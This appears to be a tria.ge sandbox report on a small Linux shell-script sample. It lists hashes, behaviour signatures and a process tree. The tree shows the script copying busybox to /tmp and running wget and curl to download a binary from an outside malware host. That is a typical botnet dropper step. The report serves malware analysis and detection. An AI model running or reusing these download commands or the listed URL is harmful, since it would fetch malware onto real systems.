Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

4

Static

static

1

69f4dcd1de...fe4.sh

ubuntu-18.04-amd64

3

69f4dcd1de...fe4.sh

debian-9-armhf

4

69f4dcd1de...fe4.sh

debian-9-mips

3

69f4dcd1de...fe4.sh

debian-9-mipsel

3

Analysis

  • max time kernel
    148s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    15/07/2024, 14:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

  • Size

    2KB

  • MD5

    1ffa7d5e3a236cf0d6981d07e1b90406

  • SHA1

    9bdae03e2410b108144841c466d1e769fea3a9ce

  • SHA256

    69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4

  • SHA512

    6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
    /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
    1⤵
      PID:1504
      • /bin/cp
        cp /bin/busybox /tmp/
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1505
      • /usr/bin/wget
        wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
        2⤵
          PID:1506
        • /usr/bin/curl
          curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
          2⤵
            PID:1510

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/busybox
          Filesize

          2.0MB

          MD5

          b4dede5fc0b1bad5cb8e901bde126b97

          SHA1

          10cbe9a418ad84a1ed297948539d37aeb58dd810

          SHA256

          a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

          SHA512

          45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

          Download Submit